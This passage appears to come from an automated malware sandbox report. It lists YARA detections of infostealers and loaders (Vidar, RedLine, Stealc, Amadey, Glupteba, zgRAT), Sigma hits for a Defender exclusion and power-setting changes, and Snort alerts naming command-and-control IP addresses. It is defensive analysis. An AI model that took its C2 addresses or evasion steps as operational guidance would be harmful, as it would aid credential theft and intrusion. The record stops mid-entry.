Process Memory Space: fq9BbqPKEgDrDHrc1Aru5zuA.exe PID: 7632	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: g1nHVnlr2tXTEWQsRz_M547D.exe PID: 7640	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: KUc3lCE6xAEEreIlM0ct4583.exe PID: 7648	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: RMz4w55AcOQKH9K459dvrUGA.exe PID: 7672	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Process Memory Space: I4B42zAlYY8EYRVPVQPCuOQX.exe PID: 7688	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 56 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
26.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c67dc0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c971f0.5.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.522aa90.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.cTThtD77H613MBNsXAevJo07.exe.3685570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
26.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.i1crvbOZAP.exe.29625ff5620.61.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625ff5620.61.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x15c6fd:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.522aa90.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.0.cTThtD77H613MBNsXAevJo07.exe.360000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x1848bd:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x184519:$s1: file:/// 0x184475:$s2: {11111-22222-10009-11112} 0x1844a9:$s3: {11111-22222-50001-00000} 0x1651c4:$s4: get_Module 0x15c3ec:$s5: Reverse 0x14b942:$s6: BlockCopy 0x16052b:$s7: ReadByte 0x18452b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.3.i1crvbOZAP.exe.29626082c80.62.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29626082c80.62.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x3cb29d:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
8.2.fq9BbqPKEgDrDHrc1Aru5zuA.exe.3a15570.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.i1crvbOZAP.exe.29625ce8c40.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625ce8c40.11.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x763148:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c9c780.26.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c9c780.26.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x7b02d1:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c1dde0.22.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c1dde0.22.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x82dfa8:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625f327c0.39.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625f327c0.39.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x5195c8:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625cd9c00.19.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625cd9c00.19.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x772e51:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
8.0.fq9BbqPKEgDrDHrc1Aru5zuA.exe.740000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.3.i1crvbOZAP.exe.29625f327c0.35.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625cff480.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625cff480.7.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x74d5d1:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
16.2.tiToqF4gUiKaoPfx2yS40yxZ.exe.9c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.i1crvbOZAP.exe.29625f327c0.35.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x5195c8:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
6.2.cTThtD77H613MBNsXAevJo07.exe.3685570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c971f0.5.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
25.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.0.tskTMObYcvz1CtypLgyOWpYi.exe.5b0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625cd9c00.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625cd9c00.9.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x772e51:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c2f140.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c2f140.3.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x81d911:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.51a3660.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.51a3660.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c1dde0.87.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c1dde0.87.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x82e6fc:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625bfd2a0.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625bfd2a0.14.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x84f7b1:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625cfe8b0.104.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625cfe8b0.104.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x74d4d8:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625d0d1e0.102.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625d0d1e0.102.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x73f2fc:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625be8caf.79.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625be8caf.79.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x86382d:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c69d20.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c69d20.8.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x7e2068:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29626049220.43.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c67dc0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.i1crvbOZAP.exe.29626065420.75.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29626065420.75.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x3e80ed:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
8.2.fq9BbqPKEgDrDHrc1Aru5zuA.exe.3a15570.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.3.i1crvbOZAP.exe.29625bfd2a0.21.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625bfd2a0.21.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x84f7b1:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625cd9c00.25.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625cd9c00.25.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x772e51:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
44.0.fSJI2dwukNtWVEjIwlXBl7N4.exe.520000.0.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x2b0a08:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.4e727d0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625ff5620.55.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625ff5620.55.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x15c6fd:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625d0d1e0.86.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625d0d1e0.86.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x73f2fc:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625bcda60.92.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625bcda60.92.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x87ea7c:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c0bda0.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c0bda0.6.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x840cb1:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
0.3.i1crvbOZAP.exe.29625be8caf.109.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625be8caf.109.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x86382d:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29626010da0.74.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29626010da0.74.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x43b73c:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625bcda60.82.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625bcda60.82.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x87ea7c:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c50820.24.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c50820.24.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x7fb568:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625be8caf.115.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625be8caf.115.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x86382d:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c9c780.28.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c9c780.28.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x7b02d1:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
10.2.KUc3lCE6xAEEreIlM0ct4583.exe.400000.6.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
13.2.RMz4w55AcOQKH9K459dvrUGA.exe.2f70e67.10.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
0.3.i1crvbOZAP.exe.29625c208e0.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c208e0.2.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x82b4a8:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625c168a0.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625c168a0.4.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x8354e8:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
0.3.i1crvbOZAP.exe.29625bfd2a0.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.i1crvbOZAP.exe.29625bfd2a0.5.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x84f7b1:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
Click to see the 102 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe, ParentImage: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe, ParentProcessId: 7680, ParentProcessName: CQTbcHuZCBIaghzHIvMnZgpt.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7540, ProcessName: powercfg.exe

System Summary

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\i1crvbOZAP.exe, ProcessId: 6984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, ProcessId: 1364, ProcessName: svchost.exe

Snort Signatures

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 5.42.65.0 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:15:32.464510
SID:	2043234
Source Port:	29587
Destination Port:	49819
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 5.42.65.117 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:15:30.376225
SID:	2046266
Source Port:	50500
Destination Port:	49814
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected PrivateLoader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 46.226.167.187

Timestamp:	03/28/24-09:15:16.113613
SID:	2049837
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.4 - Destination IP: 193.233.132.56

Timestamp:	03/28/24-09:16:05.947955
SID:	2044696
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:08.203210
SID:	2039103
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.26

Timestamp:	03/28/24-09:15:21.115017
SID:	2044243
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 5.42.65.117

Timestamp:	03/28/24-09:16:54.150552
SID:	2046269
Source Port:	49814
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.26

Timestamp:	03/28/24-09:15:22.621973
SID:	2044244
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.26

Timestamp:	03/28/24-09:15:23.082310
SID:	2044246
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:14.223978
SID:	2039103
Source Port:	49874
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:12.080730
SID:	2039103
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.56

Timestamp:	03/28/24-09:16:18.965436
SID:	2855239
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RisePro TCP Heartbeat Packet - Source IP: 192.168.2.4 - Destination IP: 5.42.65.117

Timestamp:	03/28/24-09:15:30.747159
SID:	2049060
Source Port:	49814
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected PrivateLoader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 46.226.167.187

Timestamp:	03/28/24-09:14:57.603552
SID:	2049837
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected PrivateLoader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 46.226.167.187

Timestamp:	03/28/24-09:15:16.491301
SID:	2049837
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:10.295496
SID:	2039103
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:13.374844
SID:	2039103
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 5.42.65.117

Timestamp:	03/28/24-09:16:54.150745
SID:	2046269
Source Port:	49817
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Response M1 - Source IP: 193.233.132.56 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:16:03.237197
SID:	2856122
Source Port:	80
Destination Port:	49857
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 193.233.132.74 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:16:09.606194
SID:	2046266
Source Port:	58709
Destination Port:	49863
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (External IP) - Source IP: 193.233.132.74 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:16:10.097137
SID:	2046267
Source Port:	58709
Destination Port:	49863
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:15.667120
SID:	2039103
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 193.233.132.56

Timestamp:	03/28/24-09:16:02.779397
SID:	2856147
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M7 - Source IP: 192.168.2.4 - Destination IP: 193.233.132.56

Timestamp:	03/28/24-09:16:26.888601
SID:	2856151
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 193.233.132.74 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:16:34.871412
SID:	2046266
Source Port:	58709
Destination Port:	49891
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 5.42.65.0 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:15:37.824656
SID:	2046056
Source Port:	29587
Destination Port:	49819
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (External IP) - Source IP: 193.233.132.67 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:15:59.410989
SID:	2046267
Source Port:	50500
Destination Port:	49815
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 193.233.132.67 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:15:30.519895
SID:	2046266
Source Port:	50500
Destination Port:	49815
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 193.233.132.74 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:16:25.168009
SID:	2046266
Source Port:	58709
Destination Port:	49881
Protocol:	TCP
